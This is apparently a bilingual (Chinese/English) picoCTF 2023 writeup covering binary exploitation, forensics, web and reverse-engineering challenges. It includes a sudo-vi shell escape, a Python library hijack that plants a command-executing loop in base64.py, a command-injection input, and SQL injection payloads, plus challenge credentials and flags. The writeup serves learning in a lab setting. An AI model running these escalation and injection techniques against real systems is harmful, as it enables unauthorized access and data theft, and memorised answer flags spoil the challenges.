---
# System prepended metadata

title: picoCTF 2023 Writeup
tags: [CTF, WriteUp]

---

#    picoCTF 2023 Writeup

##    Binary Exploitation

###    hijacking
    AUTHOR: THEONESTE BYAGUTANGAZA

    Description
    Getting root access can allow you to read the flag. Luckily there is a 
    python file that you might like to play with.
    Through Social engineering, we've got the credentials to use on the 
    server. SSH is running on the server.
    
####    隨便逛逛
![](https://hackmd.io/_uploads/BkCIB9eLh.png)
發現/challenge資料夾很可疑，但是沒辦法cd進去

![](https://hackmd.io/_uploads/BJpdBcgIn.png)

查看sudo 發現使用者可以用sudo權限使用vi
![](https://hackmd.io/_uploads/Hy6NrclIn.png)


####    exploit
```shell=
sudo vi

:shell
```
![](https://hackmd.io/_uploads/rkEI89xI3.png)
privilege escalation了，再來就直接A進去/challenge/把flag撈出來就好

![](https://hackmd.io/_uploads/rkETIce8h.png)

>picoCTF{pYth0nn_libraryH!j@CK!n9_5a7b5866}

####    原本解法
    這題當初在解的時候是在.server.py裡面import 的base64裡面搞鬼
    只是不知道為甚麼在寫writeup的時候沒辦法用root權限執行.server.py

先`ls -al`發現有一個`.server.py`


`cat .server.py`
```python=
import base64
import os
import socket
ip = 'picoctf.org'
response = os.system("ping -c 1 " + ip)
#saving ping details to a variable
host_info = socket.gethostbyaddr(ip)
#getting IP from a domaine
host_info_to_str = str(host_info[2])
host_info = base64.b64encode(host_info_to_str.encode('ascii'))
print("Hello, this is a part of information gathering",'Host: ', host_info)
```

`vim .server.py`沒辦法動`.server.py`，因為他是readonly，但是權限沒有設定到`base64.py`

**在import file裡面加料**
`vim /usr/lib/python3.8/base64.py`
```python=
import os
while 1:
    cmd=input()
    print(os.popen(cmd).read())
```

**get shell**
```shell=
sudo python3 .server.py
```

##    Forensics

###    hideme
    AUTHOR: GEOFFREY NJOGU

    Description
    Every file gets a flag.
    The SOC analyst saw one image been sent back and forth between two
    people. They decided to investigate and found out that there was more
    than what meets the eye here.

下載下來發現是一張圖片
看一看感覺很正常

用`exiftool`看了一下沒有把flag藏在某個欄位裡

`strings flag.png`看看
![](https://hackmd.io/_uploads/BkC8pqxIn.png)
發現裡面有長得很像路徑的東東

直接把`flag.png`當成zip解壓縮看看
```shell=
unzip flag.png
```
得到半張flag
![](https://hackmd.io/_uploads/r1xCia5lI2.png)

>picoCTF{Hiddinng_An_imag3_within_@n_ima9e_92076717}

###    FindAndOpen
    AUTHOR: MUBARAK MIKAIL

    Description
    Someone might have hidden the password in the trace file.
    Find the key to unlock this file. This tracefile might be good to analyze.

這題給了兩個檔案，第一個是`flag.zip`和`dump.pcap`。
嘗試解壓縮`flag.zip`，發現需要密碼

####    先從`dump.pcap`下手看看

用wireshark打開`dump.pcap`

![](https://hackmd.io/_uploads/r11qn2eL2.png)
隨便看幾個封包後發現都有明文

![](https://hackmd.io/_uploads/SyH7T2lUh.png)
找到一個超可疑的封包，`=`結尾很可能是base64編碼的填充字元

decode後得到半截flag
>This is the secret: picoCTF{R34DING_LOKd_

回到`flag.zip`，直接通靈把第一段flag當密碼
>picoCTF{R34DING_LOKd_fil56_succ3ss_5ed3a878}

??
##    General Skills
###    money-ware
    AUTHOR: JUNI19

    Description
    Flag format: picoCTF{Malwarename}
    The first letter of the malware name should be capitalized and the rest 
    lowercase.
    Your friend just got hacked and has been asked to pay some bitcoins to 
    1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX. He doesn’t seem to understand what is 
    going on and asks you for advice. Can you identify what malware he’s 
    being a victim of?

Google `1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX`

找到[CNBC的新聞](https://www.cnbc.com/2017/06/28/ransomware-cyberattack-petya-bitcoin-payment.html)
![](https://hackmd.io/_uploads/SkJ-yplUn.png)

>picoCTF{Petya}

水爛

###    repetitions
    AUTHOR: THEONESTE BYAGUTANGAZA

    Description
    Can you make sense of this file?
    Download the file here.
下載`enc_flag`

```=
VmpGU1EyRXlUWGxTYmxKVVYwZFNWbGxyV21GV1JteDBUbFpPYWxKdFVsaFpWVlUxWVZaS1ZWWnVh
RmRXZWtab1dWWmtSMk5yTlZWWApiVVpUVm10d1VWZFdVa2RpYlZaWFZtNVdVZ3BpU0VKeldWUkNk
MlZXVlhoWGJYQk9VbFJXU0ZkcVRuTldaM0JZVWpGS2VWWkdaSGRXCk1sWnpWV3hhVm1KRk5XOVVW
VkpEVGxaYVdFMVhSbFZhTTBKWVZGWmFXbVZzV2tkWk0yaFRDbUpXV25sVVZtaFRWMGRHZEdWRlZs
aGkKYlRrelZERldUMkpzUWxWTlJYTkxDZz09Cg==
```
==經典base64

decode後
```=
VjFSQ2EyTXlSblJUV0dSVllrWmFWRmx0TlZOalJtUlhZVVU1YVZKVVZuaFdWekZoWVZkR2NrNVVX
bUZTVmtwUVdWUkdibVZXVm5WUgpiSEJzWVRCd2VWVXhXbXBOUlRWSFdqTnNWZ3BYUjFKeVZGZHdW
MlZzVWxaVmJFNW9UVVJDTlZaWE1XRlVaM0JYVFZaWmVsWkdZM2hTCmJWWnlUVmhTV0dGdGVFVlhi
bTkzVDFWT2JsQlVNRXNLCg==
```

再decode
```=
V1RCa2MyRnRTWGRVYkZaVFltNVNjRmRXYUU5aVJUVnhWVzFhYVdGck5UWmFSVkpQWVRGbmVWVnVR
bHBsYTBweVUxWmpNRTVHWjNsVgpXR1JyVFdwV2VsUlZVbE5oTURCNVZXMWFUZ3BXTVZZelZGY3hS
bVZyTVhSWGFteEVXbm93T1VOblBUMEsK
```

de
```=
WTBkc2FtSXdUbFZTYm5ScFdWaE9iRTVxVW1aaWFrNTZaRVJPYTFneVVuQlpla0pyU1ZjME5GZ3lV
WGRrTWpWelRVUlNhMDB5VW1aTgpWMVYzVFcxRmVrMXRXamxEWnowOUNnPT0K
```
deeee

```=
Y0dsamIwTlVSbnRpWVhObE5qUmZiak56ZEROa1gyUnBZekJrSVc0NFgyUXdkMjVzTURSa00yUmZN
V1V3TW1Fek1tWjlDZz09Cg==
```

eeeeeeee
```=
cGljb0NURntiYXNlNjRfbjNzdDNkX2RpYzBkIW44X2Qwd25sMDRkM2RfMWUwMmEzMmZ9Cg==
```
aaaaaaaaaa
```=
picoCTF{base64_n3st3d_dic0d!n8_d0wnl04d3d_1e02a32f}
```
![](https://media.tenor.com/eipo4TRTSKwAAAAd/moe-simpsons-barney-e-moe.gif)

>picoCTF{base64_n3st3d_dic0d!n8_d0wnl04d3d_1e02a32f}

###    Permissions
    AUTHOR: GEOFFREY NJOGU

    Description
    Can you read files in the root file?
    The system admin has provisioned an account for you on the main server:
    ssh -p 53849 picoplayer@saturn.picoctf.net
    Password: x+T6aPgE4-
    Can you login and read the root file?    
    
![](https://hackmd.io/_uploads/B1xxDTeI2.png)

>picoCTF{uS1ng_v1m_3dit0r_f6ad392b}

水爛

###    chrono
    AUTHOR: MUBARAK MIKAIL

    Description
    How to automate tasks to run at intervals on linux servers?
    Use ssh to connect to this server:
    Server: saturn.picoctf.net
    Port: 50602
    Username: picoplayer 
    Password: tPmsUpiHeZ

![](https://hackmd.io/_uploads/ByLMuagIn.png)

>picoCTF{Sch3DUL7NG_T45K3_L1NUX_0bb95b71}

?

###    useless
    AUTHOR: LOIC SHEMA

    Description
    There's an interesting script in the user's home directory
    Additional details will be available after launching your challenge instance.

![](https://hackmd.io/_uploads/HkhIYaeIn.png)

>picoCTF{us3l3ss_ch4ll3ng3_3xpl0it3d_6173}

###    Special
    AUTHOR: LT 'SYREAL' JONES

    Description
    Don't power users get tired of making spelling mistakes in the shell? Not
    anymore! Enter Special, the Spell Checked Interface for Affecting Linux.
    Now, every word is properly spelled and capitalized... automatically and 
    behind-the-scenes! Be the first to test Special in beta, and feel free to
    tell us all about how Special streamlines every development process that
    you face. When your co-workers see your amazing shell interface, just
    tell them: That's Special (TM)
    Start your instance to see connection details.
    Additional details will be available after launching your challenge
    instance.
這題會一直把輸入的指令變成很簡單的單字，然後把開頭用成大寫
`ls`會變`Is`
`cat`會變`Cat`，但如果不是第一個字母就不會變大寫，所以可以用cat指令
用`;` 搭配Regex Command Injection
```shell=
cat;cat *
```
![](https://hackmd.io/_uploads/SJMKTpxLh.png)
發現目錄下面有一個資料夾`blargh`


```shell=
cat;cat blargh/*
```
![](https://hackmd.io/_uploads/SyasaagIn.png)

>picoCTF{5p311ch3ck_15_7h3_w0r57_f578af59}

##    Reverse Engineering
###    Reverse
    AUTHOR: MUBARAK MIKAIL

    Description
    Try reversing this file? Can ya?
    I forgot the password to this file. Please find it for me?

題目給了一個檔案`ret`，執行後要輸密碼
![](https://hackmd.io/_uploads/H1IQkCgU2.png)


丟GDB
```shell=
start 
c
ctrl^C
ni到死
```
![](https://hackmd.io/_uploads/SJHUe0eL3.png)
在呼叫strcmp比對密碼時把`rsi` dump出來，得到前半截flag

>picoCTF{3lf_r3v3r5ing_succe55ful_9ae8528

重新執行`ret`，輸入密碼
![](https://hackmd.io/_uploads/HJwZb0l83.png)

>picoCTF{3lf_r3v3r5ing_succe55ful_9ae85289}

##    Web Exploitation

###    More SQLi
    AUTHOR: MUBARAK MIKAIL

    Description
    Can you find the flag on this website.
    Additional details will be available after launching your challenge instance.
####    Bypass login    
進入網頁，經典登入介面
![](https://hackmd.io/_uploads/SkQs-CeL3.png)

```sql=
username=admin&
password=' or 'a'='a
```

![](https://hackmd.io/_uploads/HJnefAeU2.png)
題目很貼心把`query`都print出來給你

調整一下
```sql=
username=123&
password=' or 1=1;--
```

進入之後有一個搜尋頁面
![](https://hackmd.io/_uploads/SkTYRu-Uh.png)


####    測試有幾個欄位

```sql=
searchInput=' union select 1,2,3;--
```
![](https://hackmd.io/_uploads/ByxzS0uW83.png)


####    dump Table
```sql=
searchInput=' or 'a'='a
```
![](https://hackmd.io/_uploads/BJwUJt-Ln.png)
沒看到`flag`，可能在別的`table`

```sql=
' union select group_concat(sql),2,3 from sqlite_master WHERE type='table';--
```
![](https://hackmd.io/_uploads/SkJ-xt-83.png)

現在知道`flag`應該在`more_table`的`flag_TEXT`欄位

```sql=
' union select flag,2,3 from more_table;--
```
![](https://hackmd.io/_uploads/B16UGtZ82.png)
>picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_3b0fca37}


###    MatchTheRegex
    AUTHOR: SUNDAY JACOB NWANYIM

    Description
    How about trying to match a regular expression
    Additional details will be available after launching your challenge instance.
    

一開始沒看hint不知道到底要幹嘛
![](https://hackmd.io/_uploads/rk36rFZ8h.png)

結果是要match`^p.....F!?`
![](https://hackmd.io/_uploads/SyhyLF-Uh.png)

![](https://hackmd.io/_uploads/S1jOSFbLn.png)
>picoCTF{succ3ssfully_matchtheregex_9080e406}

世紀水題


###    findme

    AUTHOR: GEOFFREY NJOGU

    Description
    Help us test the form by submiting the username as test and password as test!
    Additional details will be available after launching your challenge instance.
    
先用`test` `test!`登入
![](https://hackmd.io/_uploads/S1Q0_t-U2.png)

進去後他說*I was redirected here by a friend of mine but i couldnt find anything. Help me search for flags :-)*
![](https://hackmd.io/_uploads/SyiWKKbU3.png)

####    用`BurpSuite`查看被redirected的頁面

![](https://hackmd.io/_uploads/SkjKtK-L2.png)
id看起來很像經典base64

![](https://hackmd.io/_uploads/ryteqKbUh.png)
![](https://hackmd.io/_uploads/HJZycFWLh.png)
>picoCTF{proxies_all_the_way_be716d8e}